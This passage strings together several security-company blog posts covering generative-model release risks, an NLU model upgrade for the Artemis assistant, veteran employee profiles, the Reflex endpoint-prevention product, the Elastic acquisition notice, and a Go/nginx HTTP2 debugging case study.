However, models that can produce images, text, and audio capable of fooling humans can be harmful. The common practice of reverse image searching a suspected bot’s profile image to find out if it’s a stock photo is completely defeated now with facial GANs. There’s also the disturbing success that the red-team model SNAP_R had in phishing on twitter. These aren’t vulnerabilities in software that could be patched out, attacks that are based on these generative models are attacks on human perception. We can educate people to not follow links, and to not trust things they read on a Facebook post but it takes time and there will always be “unpatched” people who are new to the internet.

Final thoughts

Healthy discussion about this continues, and we look forward to more formal forums where we can have discussions about releasing and mitigating dangerous models. Certainly, not every model need be readily available to advance the state of machine learning. If an author feels like their model could be dangerous, there should be a mechanism for them to submit it for review. If the review process validates the science and agrees that the model is dangerous, a report of the model needs to be published which includes a mitigation strategy. It is impossible to “put the genie back in the bottle” once a dangerous model is created. Nation state level actors have the resources to reproduce the full GPT-2, but we should probably not let every script kiddie on the internet have access to it.

Security sits in an unenviable position. As we have argued before, openness and transparency are adjectives to which our community should aspire. But, where’s the bright line that one shouldn’t cross? We think that line becomes crisper when one abides by the simple guiding principles as we’ve outlined here.

Over two years ago we announced Artemis, Endgame’s natural language interface to facilitate and expedite detection and response. During that time, we’ve learned how security workers employ the technology and identified some areas for improvement. When Artemis was first released, it exclusively supported the querying of events on the Windows operating system. Those were simpler times, when file names had extensions and process ids were usually multiples of 4. In 2018, we opened up the Artemis interface to events generated by Endgame Linux and OSX sensors. It was a seamless transition for our users, but in the Endgame spirit of continuous improvement, we started seeing ways to make Artemis better.

For example, if a user were to query “Search process data for apache on linux endpoints” the language model within Artemis would struggle to understand what apache was supposed to be. To a security worker, it is obvious the user meant for apache to be a process, but to a machine there isn’t much there to make a confident decision. The string apache could be a username or a process name because prior to the inclusion of Linux/OSX, Artemis was trained to associate extensions to file/process names. Without more specification (ie “user apache”) the best Artemis can do is lean toward guessing process name.

We found that training on the old architecture explained here could produce better recognition of extensionless files. Unfortunately any gains were offset by the expense of model size, training time and showstopper misses, making the new model infeasible to deploy.

BotInspector
We needed a way to perform an apples to apples comparison of potential solutions. This meant building a platform to train, evaluate, and test against a common set of data. We developed a BotInspector, a pipeline tool for creating NLU models. BotInspector allows us to quickly train new models using different features or architectures and provide summary statistics. Moreover, it provides a useful comparison view that highlights performance differences between model versions.

The Winner Is...
Ultimately a deep learning approach won out. Specifically, a Bidirectional-Long Short Term Memory Conditional Random Field (thankfully referred to as BiLSTM-CRF for short) signficantly outperformed our original, standard CRF model. Not only was performance better, the model itself saw a 50x reduction in size (see table below) which enables us to push regular updates to the language model via our cloud services to its home on the Endgame Platform. The main reason for the difference in overall performance was due to the features being passed to the CRF.

In our original model the lack of a trained embedding layer forced a ballooning in model size, because the variety and size of the features in the model grew with the variety of vocabulary in the training data. This meant that whatever handcrafted features we tried, i.e. the last 3 letters of the word, the model would basically save those features to help out the later classification. It would essentially perform a lookup of a given feature in order to get a number which would then be placed into the word vector and fed to the CRF. This limited us to smaller handcrafted features so as not to balloon our model. We also needed to augment our handcrafted features with parts of speech tagging, ie adding that a certain word was a verb or plural noun to our feature vector. This added cost since the parts of speech tagging was in fact just another large model. All of which added to bloat in our deployments.

Our new BiLSTM-CRF model still has a CRF as the final step in the model, but ends up working since we train our own embedding layer which means our model is saved based on learned similarities of words, called an embedding layer, instead of a straight vectorization of the features themselves. This model acts as a function which can turn a tokenized sentence into a per word array of tag probabilities. In our case these tags are Inside-Outside-Beginning or IOB tags. The CRF takes these per word tag probabilities and uses the Viterbi algorithm to produce the most likely path of tags “Search for calc.exe” -> “O O B-ENT-FILE” which Artemis can then send to the EQL powered search functionality in the platform.

*Weighted avg. of the F1-Score generated by scikit-learn ClassificationReport

Moving Forward
Security software typically just sucks to use. At Endgame, we are driven to learn from the consumer-side of technology and implement trends and tools that make our customers’ lives easier. Our vision is to make Artemis your virtual security assistant, always ready with the information you need at your fingertips. Join us on this journey by trying our newest release, version 3.8!

With observances including Memorial Day, Military Spouse Appreciation Day, and Armed Forces Day, it’s fitting that May has been designated Military Appreciation Month. It’s also a special month to Endgame, as we not only count members of the armed forces as valued customers, but we ARE members of the armed forces. Endgame employees represent all branches of the U.S. military, with some continuing to serve in the National Guard and Reserves.

To recognize the service of these men and women in uniform, Endgame has partnered with the DC Chapter of Team Red, White, and Blue (Team RWB) in support of the organization’s mission to enrich the lives of veterans by connecting them to the communities they serve. Team RWB has dozens of chapters across the country and more than 115,000 members. While our contribution pales in comparison to the service of these men and women, we are honored by the opportunity to demonstrate our appreciation for the sacrifices they have made – both past and present.

On Saturday, May 4, we will be hosting members of Team RWB in Arlington, VA for lunch and a private screening of Avengers: Endgame. We couldn’t think of a more fitting way to show thanks to our heroes in uniform than by watching some heroic acts on the big screen!

We are also thrilled that so many of our employee veterans volunteered to share what their military service means to them. Below are a few of their stories:

RICK HENSLEY
Sr. Vice President, Customer Success
Lieutenant Commander, U.S. Navy

Rick served in the U.S. Navy for 12 years (six active and six reserve) and as a civilian in the U.S. Air Force also for six years.

He began his military career serving in the Navy Supply Corps, where he practiced a variety of disciplines including supply management, inventory control and financial management. After six years managing logistics, he left active duty and became a reservist in the Navy and civilian in the Air Force, both roles focused on information warfare.

What he appreciated most during his service was the opportunity to grow as a leader, further his education, and serve his country while traveling the world. In his words, “I both served and was served by the military.”

Rick credits much of what he learned about leadership to his time in the Navy. Upon reporting to his first ship in his early 20s he immediately had more than 35 direct reports, some of whom were twice his age. The early career experience taught him at least two critical life lessons: The importance of listening to and learning from senior enlisted personnel regardless of rank, and the value of humility in leading teams.

“As a veteran, when I see people in uniform I thank them for their service. No service is easy service. I was fortunate to serve outside of wartime, but a lot of service men and women put their lives on the line. It’s important to remember, respect and appreciate that every day because they ensure our freedom.”

JOSEPH PILKINGTON
Sr. Threat Hunter and Technical Training Manager
Sergeant E-5, U.S. Army

Joe served four years in the U.S. Army. He credits the Army with giving his life direction early on and providing a great start to his career.

There’s a saying in the Army: Right time, right place, right uniform. According to Joe, it’s a lesson he takes to work with him every morning, “The basics are of paramount importance - they show discipline, accountability, and dependability. Things fall into place when you start with a solid foundation.”

While serving, Joe also learned a lot about team bonding and working together as a cohesive unit. He cites working alongside people from diverse backgrounds, cultures, and ages in an atmosphere where every individual is valuable to the mission as broadening his perspective and appreciation for others’ views. That’s why he’s also proud to count many of the individuals he served with, including his former leadership, among his closest friends today.

“Without the military I wouldn’t be where I am today. It gave a great start to my career and great values along the way. It was extremely beneficial and I’m still very proud to have made the decision.”

RACHAEL RIVAS
Sr. Payroll Accounting Manager
O-2, U.S. Army

Rachael joined the Army during her senior year of college and spent eight years in service. While finishing her undergraduate degree in Accounting, Rachael had the opportunity to work at the university she was attending in her field. As a young person entering the workforce, the experience showed her the benefit of an educational background, while also exposing the importance and value of personal development.

Rachael set out to take learning one step further and decided to join the military to enter a committed obligation in serving others, and to pursue travel, character building and cultural exposure. She viewed Soldiers as an esteemed class of strong, focused, selfless, honorable individuals who lived with an air of integrity and purpose. Qualities she knew would enhance the trajectory of her future and serve as a life-long tool.

After meeting with recruiters from every branch of the U.S. military the Army became the obvious choice, giving her the opportunity to pursue graduate studies, while providing a financial and administrative program that worked with her career path.She learned both leadership and teamwork from military service, including the importance of discipline, communication skills and focus. In her words, “Being in service instilled in me a mindset of togetherness, which kept me accountable for my individual contribution to the mission, and how that affects others around me. There is strength in numbers!” (Spoken by a “numbers” person!)

Rachael continues to live into the mantra that there is no “I” in team. The Army gave her the opportunity to learn it young and carry that lifelong lesson of caring about others into her daily interactions. At Endgame, she is conscious of the team, how we grow, what our mission and values are together, and how her contributions map to company goals. What she enjoyed most about her time in service was the camaraderie and unity with people from different walks of life, being able to band together for a shared mission.

“Service made me a stronger person. I learned that we can accomplish more together than I ever would on my own. I believe that the power of connectivity has no limits.”

BRIAN H WILLIAMS
Sr. Federal Account Director
Major, US Air Force

Brian spent more than 20 years as a Communications and Cyber Operations Officer in the U.S. Air Force – a career he knew he wanted to pursue even as a teenager. He planned to join the Air Force out of high school with an eye toward becoming an air traffic controller. But life had other plans. Lacking an opening for the position he had in mind, Brian pursued an undergraduate degree in computer science and graduated from Louisiana Tech before accepting an Air Force ROTC scholarship to continue his education and join the service.

What he most enjoyed most about his time in the Air Force was the sense of accomplishment in doing something bigger than himself. “I had a lot of friends that graduated with me, taking jobs that made a lot more money. But every time we would deploy – whether it was in a combat zone or for a humanitarian mission – we were doing it for somebody else and something bigger than making a paycheck. I was honored to contribute to the welfare of our country and others around the world.”

His most important learning? Recognizing that he didn’t have to be the smartest person in the room. Whether he had a unit of 10 people or 10,000 people working for him, he learned the key to success was to intelligently use the resources available to be the most effective and efficient at accomplishing the mission. It’s a lesson Brian applies equally to his career at and Endgame and in his personal life.

“Endgame has a great culture and employs a number of people with military experience. That combination is part of what makes this company so effective. We never say never. Across the board – everybody brings that attitude to the table.”

NATE FICK
CEO
Captain, U.S. Marine Corps

Fresh out of Dartmouth and years before he would write his bestselling book, One Bullet Away, Nate knew he didn’t want to follow the career path that so many of his classmates were on. Banking, law or medicine held little appeal. He knew he wanted to contribute back to society in the form of public service and he wasn’t afraid of a challenge. The opportunity to take on both while gaining a lesson in leadership led him to join the U.S. Marines.

While on active duty, Nate discovered a knack for building and leading diverse teams under tough circumstances, a role in which he found himself from 1999 to 2004, during the kickoff of the wars in Afghanistan and Iraq. He counts the opportunity to lead teams during those years as the most humbling and gratifying of his career.

By his estimation, military experience is one of the few places in American life that gives young people a lot of real responsibility. It’s not the only place, of course - being in the Peace Corps or taking on a teaching role in an inner-city school are similar. In each case, it gives a young person the opportunity to be a part of something bigger than themselves.

One of the questions Nate gets asked regularly is what he learned in business school that he applies to running Endgame. But, he explains, a lot of what he relies on every day he learned in the Marines. And they’re simple things – ones most of us learn in kindergarten: Treat people the way you want to be treated; often times, half the battle is just showing up; and, it’s really all about grit.

According to Nate, there is no linear path to success. Whether an individual career or building a business over time, things only look linear and smooth in hindsight. The reality is that it can feel like a knife fight every single day. But the role of a leader is to articulate the vision, build the team, establish and maintain the culture, and make sure you equip people to do their jobs.

People often think of the military as a very hierarchical, top-down organization, but that wasn’t Nate’s experience at all. As a Junior Officer in the Marines, he saw a ton of authority and responsibility delegated out to very junior leaders. And that’s just the template he is using for building and running a fast-paced organization.

“There isn’t time for centralized decision making. Hire great people, make sure they are operating in shared context, and give them the freedom to do their jobs. It was true in the Marine units I served in and it’s certainly true here at Endgame.”

We are excited to announce the release of Reflex™. Reflex is the first technology to move customized protection within reach of security teams, combining a flexible architecture, query language, and a host-based execution engine that eliminates the time between detection and response, addressing the “breakout window” across enterprise networks. Reflex runs in-line on the endpoint, with no need for human interaction or confirmation, to stop adversaries before they have the chance to cause damage or loss.

The purpose of this post is to talk about why we developed Reflex and walk through a few use cases.

Why is Reflex necessary

Expanded protection across ATT&CK

At Endgame, we’ve built and continue to extend as many behavioral protection layers as possible. We extend protection across the entire MITRE ATT&CK matrix, covering phases of an attack from initial access through to actions on objectives. The idea is that the more layers put in place between an adversary and their objective, the closer to zero the probability that the attacker will move undetected, reducing the time it takes to detect and respond to an incident before significant damage or loss.

Different adversary techniques require different solutions. Typically, endpoint protection products provide inline preventions for a small subset of an overall attack, focused on blocking initial access, malware-based execution, or fileless techniques like process injection. With the rise of attacker focus on misuse of credentials and legitimate tools like Powershell, that’s not enough. And while this is a significant issue for Windows clients and servers, it is an even bigger problem for defenders protecting on Mac and Linux where malware and exploit detection-based approaches will fail.

Even the so-called “next-gen” endpoint protection vendors struggle to defend against broader adversary techniques, because they are mostly focused on detections across post-compromise portions of ATT&CK. From the outset, we knew that for Endgame to protect across the widest set of techniques, we needed to deliver the best data through a unique and flexible architecture. We use the Event Query Language (EQL) to process our endpoint telemetry with a set of primitives that take into account complex ancestry and temporal relationships between the entire body of telemetry data on an endpoint. Using this data, we can describe nearly every technique in ATT&CK with precision and generate high-fidelity detections, leading to an enormous increase in the scope of protections we provide – all of which can run in prevention or detection mode.

Endgame stops the problem, we don’t just tell you about it

Manual triage, scoping, and response by the SOC are time-consuming and error-prone next steps. Our customers don’t want us to just tell them about problems, they want us to stop problems with high confidence and give them the necessary capability and context to enable their scoping, response, and verification processes.

Some advanced and budget-rich SOCs are beginning to use security orchestration, automation, and response (SOAR) products to try to take automated preventative actions when certain conditions present themselves. Aside from introducing yet another platform into an already complex set of workflows and processes, this out-of-band approach is not only adding additional latency, it can be limited and inflexible in-terms of outcomes.

With 98% of our customers choosing Endgame for prevention, we needed to bring prevention technology across the entire MITRE ATT&CK Matrix.

Customization

Some endpoint protection vendors claim to allow users to create their own detections - a desirable feature for many organizations, especially for mature teams who have already embraced the death of a one-size-fits-all approach to information security. What you don’t get from any vendor, beyond very basic blacklisting or rudimentary application control features, is the ability to deploy customized preventions. You can use the endpoint agent to stop inline what your vendor lets you stop, and that’s it. Anything else you want to stop happens out-of-band from seconds, to minutes, or maybe even hours later.

Drawbacks of Cloud-Reliance

Building analytics on top of endpoint telemetry data is not new. The user-creation of detections has been a common selling point for vendors that layer ‘analytics’ on top of a SIEM, and as the EDR market matures, creating rules against the EDR data-lake will become part of the next buzzword-bingo card. The vendors that shout the loudest about data, streaming, and analytics all have one thing in common – an overwhelming reliance on their vendor-owned cloud services. The cloud is great for large scale analytics and threat hunting. You need massive data to develop and noise-test possible detections, whether they’re implemented in EQL or otherwise.

What the cloud isn’t great for is prevention. It is slow. Data is shipped from endpoint to cloud, run through an analytics engine, and an alert is displayed in a SOC. In the time that takes, a malicious process will often have already completed, and the attacker is off and running. Disconnected endpoints get no protection at all. If any alerts appear they are inherently detection-only, requiring manual response.

Cloud analytics plus manual response or orchestration is not good enough for prevention. We need to deploy our preventative controls on the endpoint and operate them effectively in-line.

Reflex in Action

Reflex enables users to create and deploy protections across MITRE ATT&CK. These protections apply to connected and disconnected endpoints and operate in near real-time.

Endgame ships with a large number of analytics to detect malicious behaviors with high confidence. Techniques such as misuse of Powershell and other often-abused built-in utilities, spear-phishing as indicated by suspicious child processes of applications like Word, system reconnaissance, stealthy persistence, and much more are handled out-of-the-box via Endgame-provided Reflex analytics. The power of Reflex allows our users to take action to contain and stop the malicious behavior and THEN investigate what happened, as opposed to investigating what is already happening well into the breakout window.

Our users are exceptionally well protected with what we provide. However, at Endgame we’re committed to giving users the tools they need to create security solutions tailored to their own unique environment. The most exciting capability of Reflex is that users can create their own protections which include a choice of preferred response actions.

Let’s run through a few examples of Reflex in action.

Discovery command sequences

Discovery commands, also referred to as enumeration commands, comprise an entire tactic column of ATT&CK. What is Discovery all about? When an attacker lands on a endpoint, they won’t usually know exactly where they are, what’s around them in the network, and what is on the endpoint. They will often run a set of commands to assess things like where the system can route to, what processes are running, what’s on the filesystem, what user accounts exist, what timezone the machine is in, and much more. This allows the attacker to get a good picture of the value of the system, its suitability for use as a persistent beachhead on the endpoint, and what opportunities may exist for lateral movement. Discovery techniques are a great set of adversary actions for defenders to look for.

The problem with Discovery is that the commands run by an attacker are commands often run by users and admins. If a user is having network trouble, she may run “ipconfig /all” to look at the network configuration. They may run “tasklist” to look at running processes. And so on. Alerting every time any one of these commands is run would be an False Positive disaster.

Many attackers will run a series of these commands via a script. This will lead to execution on the endpoint of a set of commands within a certain time window. Performing an analytic for this activity requires maintenance of state, which is very difficult for many products but a core use case for EQL.

The EQL above allows us to look for Discovery commands run within a short window. Our engine maintains state on the endpoint and knows when the customized threshold for alerting is met.

It is great to have a capability to alert on this, but even better to stop the problem. This custom Reflex could be configured to kill or suspend the parent process which would be a script host process or shell from which individual Discovery commands, and perhaps other malicious activity, are spawning.

Spear-phishing

Spear-phishing is the most common way for adversaries to get initial access to networks. Endgame has many layered capabilities in place to block spear-phishing including MalwareScore for macros, our machine learning-powered malicious document classifier, and a host of Endgame-provided Reflex analytics.

When an attacker spear-phishes for access, they seek to gain execution on the endpoint. One way this will usually manifest itself is in the endpoint data as a malicious child process of a MS Office application. Process ancestry queries are often difficult to implement in relational database-backed security tools due to performance impacts of the complex joins they require on backends, but Reflex was designed from the ground up to support process ancestry as a core feature which is easy to express and performant to execute.

The EQL above will fire anytime that Powershell launches anywhere below Word, Excel, or Powerpoint in a process ancestry tree. This simple expression is a great example of the power of EQL. Users might combine this with an automatic, on-the-endpoint action to immediately kill the Powershell process and isolate the likely-compromised endpoint from the network.

Policy Enforcement

Organizations have a huge variety of policies they wish to enforce, from regulatory and compliance directives to self-declared, internal IT guidelines. Reflex can be used to enforce and block a huge set of this surface, and its customizability is necessary given how varied IT and security policies are between organizations.

The universe of possible Reflexes in this area is nearly endless, but we’ll briefly cover one illustrative example.

This simple EQL is deployed in an environment that doesn’t want to allow any unsigned processes executing outside of the base Windows and Program Files folders. This restrictive policy would block many unwanted applications or pieces of potential malware. One can imagine how to extend this into a huge number of other use cases - blocking execution from network shares, restricting to a set of named applications, only allowing network connections from allowed applications, and much more.

Matching across event types

It is necessary in security to flexibly join and match across event types to ask the right security relevant questions. EQL and Reflex support this in a straightforward and performant manner. One example use case is as follows.

This query is joining across three different event types: file, process, and network. It fires when a process which is backed by a file dropped by a Powershell process which talked on the network executes. Why does this matter? Powershell is often used as a mechanism to download and run malware which the adversary hosts on the internet. The attacker gains execution, runs a short Powershell command to grab a file from the network, and then that file is executed. It is trivial to link all of these events together with EQL and using the overall Reflex engine, we can isolate the compromised host, delete the dropped file, and kill all related processes effectively in real-time, with no cloud connection or round trip required.

Summary

Reflex changes the game for defenders, allowing for configurable, real-time, cloud-less prevention across Windows, Mac, and Linux. Security teams want control and teams want prevention without complexity, delay, or friction between totally separate tools. Reflex provides all of that in a straightforward and performant package. If you’d like a demo, click here to get in touch.

We are excited to announce that Endgame has entered into an acquisition agreement to join forces with Elastic N.V. (NYSE: ESTC). Together, we will bring to market a holistic security product that combines endpoint and SIEM, and is delivered via Elastic’s unique go-to-market model.

The Endgame Story

Endgame’s mission is to protect the world’s data from attack. We’ve been driven by a conviction that even the best of existing prevention technologies are complicated, costly, and available only to a select few, while legacy solutions repeatedly fail to stop the theft or ransom of valuable data.

Our goal is to elevate and empower users at all levels of expertise and experience. To help us do that, we built Artemis, the industry's first natural-language security chatbot, Resolver, a unique attack visualization technology, and Reflex powered by EQL (Event Query Language), the first language to describe adversary behavior and customized response.

We have been gratified by the third-party recognition and customer validation this approach has garnered. Wherever possible, we have shared fundamental research with the world -- open-sourcing EQL, providing malware model training data, and adding our anti-malware technologies to VirusTotal for all to use. And through it all, we have been amazed time and again by the feedback from our users and customers who rely on Endgame to protect some of their most valuable assets.

Our Shared Future

The natural next step in the evolution of our company is to get this endpoint platform into the hands of those who need it most –more hands than we could find on our own.

As we investigated ways to accelerate our community engagement, we noticed that we were receiving more and more requests to integrate with Elastic. Our users knew that the only way to stop damage and loss was to have leading prevention coupled with endpoint detection and response (EDR). They were frustrated by limits on their ability to retain, search, and respond to the history of their security events, and so they were naturally turning to Elastic for their expertise in search. Of course, we already knew first-hand the power Elastic could bring to security since it serves as the core of our Endgame platform.

We quickly came to believe that there was a huge benefit to both parties in joining forces. Endgame would gain an ability to get our endpoint technology into the hands of dev ops, security practitioners, and IT users throughout the world, and Elastic would gain access to endpoint telemetry in the market in order to enhance a security use-case their users were already embracing.

It was a natural fit.

Most importantly, both companies and teams share the same core values and the same relentless focus on the success of our users. With the power of Elastic, we will continue to provide the best endpoint protection we can, while also accelerating the integration of our data into our users’ Elastic Stacks, empowering actionable security.

Our CTO, Jamie Butler, says it well: “In information security, nothing is more critical to comprehensive protection than access to rich, actionable data in real-time. The combined force of Elastic’s powerful data platform and Endgame’s award-winning endpoint security offering gives customers strong insight into their data. Both organizations share a commitment to openness, transparency, and user enablement, making this an exciting opportunity for both our employees and for the joint user community. The combination of our solutions will change how the world thinks about data, analytics, and security.”

There is so much we can do together.

We are excited by the opportunity to converge SIEM and endpoint technologies to drive a whole new level of collaboration for security teams. Our users are rapidly adopting the Elastic Stack as the most useful destination for their security information, and together we can ensure a first-class experience when integrating Endgame’s robust security data in Elastic Common Schema (ECS) into the Stack.

Additionally, users love Endgame’s ability to bubble-up the information that matters within their security data. For example, Resolver provides a visual representation of the full extent of the attack, allowing users to do root-cause analysis easily, and to build effective response plans regardless of their level of expertise. Now, we can use the power of Kibana to provide even more dashboard and visualization capabilities, further enabling users to see and respond to what matters quickly.

I am hugely impressed by the vision, ambition, humility, and expertise of the Elastic team and I cannot wait for our joint users to see the capabilities we believe we can bring together. This is only the beginning, and the perfect closing to this note is with a glimpse of the future from Elastic’s Founder and CEO, Shay Banon: “It's been a humbling experience to get know the Endgame team. We are very aligned on a go-to-market strategy and building solutions that combine our search technology with Endgame's endpoint product to give users the best possible threat hunting, SIEM and endpoint experience. We are excited for the opportunity to join forces with Endgame and welcome the Endgame team to Elastic and our community.”

Additional Information and Where to Find It

Elastic N.V. (“Elastic”) plans to file with the Securities and Exchange Commission (the “SEC”), and the parties plan to furnish to the security holders of Endgame, Inc. (“Endgame”) and Elastic, a Registration Statement on Form S-4, which will constitute a prospectus of Elastic and will include a proxy statement of Elastic in connection with the proposed merger of Avenger Acquisition Corp., a Delaware corporation and a direct wholly-owned subsidiary of Elastic (“Merger Sub”) with and into Endgame (the “Merger”), whereupon the separate corporate existence of Merger Sub shall cease and Endgame shall continue as the surviving corporation of the Merger as a direct wholly-owned subsidiary of Elastic. The prospectus/proxy statement described above will contain important information about Elastic, Endgame, the proposed Merger and related matters. Investors and security holders are urged to read the prospectus/proxy statement carefully when it becomes available. Investors and security holders will be able to obtain free copies of these documents and other documents filed with the SEC by Elastic through the website maintained by the SEC at www.sec.gov. In addition, investors and security holders will be able to obtain free copies of these documents from Elastic by contacting Elastic’s Investor Relations by telephone at +1 (650) 695-1055 or by e-mail at ir@elastic.co, or by going to Elastic’s Investor Relations page at ir.elastic.co and clicking on the link titled “SEC Filings” under the heading “Financials.” These documents may also be obtained, without charge, by contacting Endgame’s COO and General Counsel by telephone at +1 (703) 650-1264 or by e-mail at dsaelinger@endgame.com.

The respective directors and executive officers of Endgame and Elastic may be deemed to be participants in the solicitation of proxies from the security holders of Elastic in connection with the proposed Merger. Information regarding the interests of these directors and executive officers in the transaction described herein will be included in the prospectus/proxy statement described above. Additional information regarding Elastic’s directors and executive officers is included in Elastic’s proxy statement for its Extraordinary General Meeting of Shareholders, which was filed with the SEC on March 28, 2019. This document is available from Elastic free of charge as described in the preceding paragraph.

Forward-Looking Statements

This communication contains forward-looking statements which include but are not limited to: Elastic’s ability to offer a comprehensive security solution focused on endpoint security and integrated with Elastic’s existing security efforts; Endgame’s EDR and EPP capabilities, in combination with Elastic’s security efforts, will help organizations extend threat hunting to the endpoint; the benefit to Elastic customers of deploying Endgame’s product; the benefit to Endgame customers of deploying the Elastic Stack; our ability to successfully integrate our products, technologies and businesses; the ability to use Elastic search technology in combination with Endpoint data; our ability to successfully align our product roadmaps and go-to-market strategy; customer acceptance of our combined product lines and the value proposition of our combination; the future conduct and growth of our business and the markets in which we operate; our ability to obtain necessary regulatory approvals to close the Merger; our ability to obtain shareholder approval for the Merger; and the expected timing of the proposed Merger. These forward-looking statements are subject to the safe harbor provisions under the Private Securities Litigation Reform Act of 1995. Our expectations and beliefs regarding these matters may not materialize. Actual outcomes and results may differ materially from those contemplated by these forward-looking statements as a result of uncertainties, risks, and changes in circumstances, including but not limited to risks and uncertainties related to: the ability of the parties to consummate the proposed Merger, satisfaction of closing conditions precedent to the consummation of the proposed Merger, potential delays in consummating the Merger, and the ability of Elastic to timely and successfully achieve the anticipated benefits of the Merger. Additional risks and uncertainties that could cause actual outcomes and results to differ materially from those contemplated by the forward-looking statements are included under the caption “Risk Factors” and elsewhere in our most recent filings with the SEC, including our Quarterly Report on Form 10-Q for the fiscal quarter ended January 31, 2019 and any subsequent reports on Form 10-K, Form 10-Q or Form 8-K filed with the SEC. SEC filings are available on the Investor Relations section of Elastic’s website at ir.elastic.co and the SEC’s website at www.sec.gov. Elastic assumes no obligation to, and does not currently intend to, update any such forward-looking statements after the date of this release, except as required by law.

At Endgame Engineering, experience has shown us that small errors in the edge cases of web service connection lifecycles can eventually contribute to production outages. So we believe it’s worth the time to exhaustively investigate bugs that we don’t understand and also explore related areas in the code to resolve issues before customers are impacted.

This case study will walk through the identification, investigation, and resolution of errors that we identified in our data streaming pipeline. We will discuss how we use Go and nginx in our tech stack and the lessons we learned while debugging and tuning their HTTP2 performance, as well as some general lessons we learned about debugging these sorts of issues.

Background

Endgame has made it a priority to invest in observability for our customers that are using the Endgame platform. We collect telemetry information about the health of our cloud hosted and on-premises installations and consolidate that information into a centralized data streaming pipeline. We apply streaming analytics on the data to monitor performance trends and product efficacy. Our engineering, customer support, and research teams use the data to regularly roll out improvements to the product.

At a high-level, the pipeline consists of:

Several data collection services which run on customer platform instances and gather telemetry data.
A NATS streaming server on each local platform that queues data for transmission.
A gateway service written in Go that establishes a secure HTTPS connection to the Endgame cloud backend using two-way MTLS. It streams messages from the local queue to our hosted environment.
A nginx server in our hosted environment that terminates the HTTPS connection and forwards messages to a data streaming platform.
Several downstream data consumers that post-process the information for consumption by our internal support teams.

The communication between our deployed platforms and the hosted environment happens over an HTTP2 protocol connection. We chose to use HTTP2 because of its superior compression and performance for high-throughput pipelined communications. Furthermore, HTTP2 is a broadly adopted industry standard, which allows us to easily integrate client and server technologies without custom code.

Symptoms

We noticed several of our cloud hosted platforms reporting this error message in their logs with increasing frequency:

ERR Failed to send 'endpoint-health' message to cloud from queue 'feedback.endpoint-health': Post
https://data.endgame.com/v2/e/data-feedback/endpoint-health: http2: Transport: cannot retry err [http2:
Transport received Server's graceful shutdown GOAWAY] after Request.Body was written; define
Request.GetBody to avoid this error

It became apparent that this was a growing issue as the frequency of this error closely aligned with the increasing overall messages per second received by our data streaming backend. We used the AWS log search tool mentioned in an earlier blog post to confirm that the error was occurring broadly across many platforms. This led us to believe that the error was trending with overall data volume. Since we are regularly adding new telemetry and new customers, we concluded that the problem would most likely continue to worsen over time.

We were concerned that this error message represented data loss which would impact our customer support teams that rely on the data. Thankfully, we have retry logic at the application level that ensured these intermittent errors did not cause data loss. In order to ensure that the increasing error rate would not cause data loss in the future, we set out to determine why HTTP2 connections were regularly dropping.

Reproduction

The clear and unique error message from the Go HTTP2 library enabled us to immediately identify the place in the code where the error originated. This told us two things: First, we were misusing the Go HTTP2 transport somehow. And second, our nginx server was returning unexpected GOAWAY messages.

We worked backward from the error message to produce a small Go function that would reproduce the problem:

doRequest := func(string url) error {
           req, _ := http.NewRequest("POST", url, nil)
           req.Body = ioutil.NopCloser(bytes.NewReader([]byte("{}")))
           resp, err := http.DefaultClient.Do(req)
           if resp != nil {
                 defer resp.Body.Close()
           }
           return err
}
for i := 0; i < 1001; i++ {
      go func() {
           err := doRequest("https://data.endgame.com/v2/e/data-feedback/endpoint-health")
           if err != nil {
                fmt.Printf("HTTP error: %v\n", err)
           }
     }()
}

NOTE: We’ve excluded some domain name and TLS configuration details from this example that are required to authenticate with our servers. If you run this example yourself you’ll see a slew of HTTP 403 errors and probably some TLS connection errors as well.

Running this code produced the output we expected:

HTTP error: Post
https://data.endgame.com/v2/e/data-feedback/endpoint-health: http2: Transport: cannot retry err [http2:
Transport received Server's graceful shutdown GOAWAY] after Request.Body was written; define
Request.GetBody to avoid this error

In our original implementation we used the Request.Body field to prepare a call to the Client.Do function. This turned out to be the source of the error, since the Go client does not have enough information to retry the request. The Request.Body field expects an io.ReadCloser and it closes the reader after the first HTTP request. On the other hand, if we use the Request constructor, http.NewRequest, we can pass an io.Reader object instead. Then the request constructor can properly prepare the necessary data structures internally for retrying the request automatically.

So, the fixed doRequest function is:

doRequest := func(string url) error {
           req, _ := http.NewRequest("POST", url, bytes.NewBufferString("{}"))
           resp, err := http.DefaultClient.Do(req)
           if resp != nil {
                defer resp.Body.Close()
           }
           return err
}

We learned a few important points while working through the reproduction:

The error only occurred if we ran many requests in parallel with goroutines. The HTTP client in Go is thread-safe, so generally we would expect it to work fine in parallel. This indicated that the error was related to the way that the connection was being closed by the server while several requests were in flight.
The error always occurred on the 1,001st request.

To better understand the HTTP2 traffic we re-ran the reproduction using the Go HTTP2 debugging flag GODEBUG=http2debug=2 that is built-in to the http library. This provided some more detail on the exact cause of the error. The 1,000th request included this unique logging information:

http2: Framer 0xc0003fe2a0: wrote HEADERS flags=END_HEADERS stream=1999 len=7
http2: Framer 0xc0003fe2a0: wrote DATA stream=1999 len=2 data="{}"
http2: Framer 0xc0003fe2a0: wrote DATA flags=END_STREAM stream=1999 len=0 data=""
http2: Framer 0xc0003fe2a0: read GOAWAY len=8 LastStreamID=1999 ErrCode=NO_ERROR Debug=""
http2: Transport received GOAWAY len=8 LastStreamID=1999 ErrCode=NO_ERROR Debug=""
http2: Framer 0xc0003fe2a0: read HEADERS flags=END_HEADERS stream=1999 len=115

This made it clear that the server was sending GOAWAY frames at the 1,999th stream ID. The HTTP2 spec further clarifies that GOAWAY is sent by the server to explicitly close a connection.

Tuning NGINX HTTP2 Settings

Clearly, nginx was closing HTTP2 connections at the 1,000th request. This clue was detailed enough to find an old Go issue referencing the same problem. This validated our findings that the behavior occurred specifically with nginx when requests happen in parallel over the same HTTP2 connection. Go fixed their library in 2016 (and again in 2018) to better handle this specific behavior with nginx.

The conversations in these issues confirmed that nginx was closing the connection due the http2_max_requests setting in the nginx http2 module, which is set to 1000 by default.

An nginx issue opened in 2017 discussed ways to handle this setting for long-lived connections. In our use case, we expect to have HTTP2 connections open for a long time as messages are streamed to the server. It seemed like the best course of action would be to set http2_max_requests to a large value (say, 1 million) and accept that nginx would regularly close connections.

Digging Deeper

We could claim that the Go client http.Request constructor and possibly also the nginx setting was the “root cause” and be done with the investigation. But at Endgame we emphasize an engineering culture that values tenacity and technical excellence, and we agree with John Allspaw and many others that “there is no root cause” in complex systems. Rather, incidents have several contributing causes that emerge from unexpected events and decisions by engineers over time as they build and maintain an overall system.
